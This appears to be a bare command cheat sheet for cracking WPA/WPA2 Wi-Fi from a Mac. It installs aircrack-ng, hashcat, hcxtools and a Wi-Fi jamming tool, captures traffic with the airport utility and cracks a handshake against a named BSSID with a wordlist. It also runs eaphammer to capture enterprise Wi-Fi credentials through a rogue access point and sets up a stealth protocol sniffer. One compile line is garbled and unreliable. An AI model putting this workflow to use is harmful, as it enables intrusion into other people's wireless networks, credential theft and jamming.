<https://programmer.group/mac-os-cracking-wifi-wpa-wpa2.html>
git clone <https://github.com/Tommrodrigues/WiFiCrack.git>
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
git clone <https://github.com/hashcat/hashcat-utils.git>; cd hashcat-utils/src; gcc -o cap2hcca; px cap2hccapx.c; mv ./cap2hccapx /usr/local/bin/
brew install aircrack-ng
brew install hashcat
brew install hcxtools
brew install --cask wireshark
<https://github.com/0x0XDev/JamWiFi>
#Check
airport -h
aircrack-ng --help
cap2hccapx -h
hashcat -h
hcxhash2cap -h
tcpdump -h
wireshark -h
ifconfig
airport -s
airport en0 sniff 7
aircrack-ng /tmp/airportSniffLbhZSp.cap
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap
sudo ./eaphammer --interface en0 \\
--auth wpa-eap \\
--essid WiFIName \\
--creds
GitHub - cursedpkt/Above: Invisible network protocol sniffer
# Install python3 first
brew install python3
# Then install required dependencies
sudo pip3 install scapy colorama setuptools
# Clone the repo
git clone <https://github.com/cursedpkt/Above>
cd Above/
sudo python3 setup.py install
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff
sudo above --interface en0 --timer 120 --output-pcap ./dump.pcap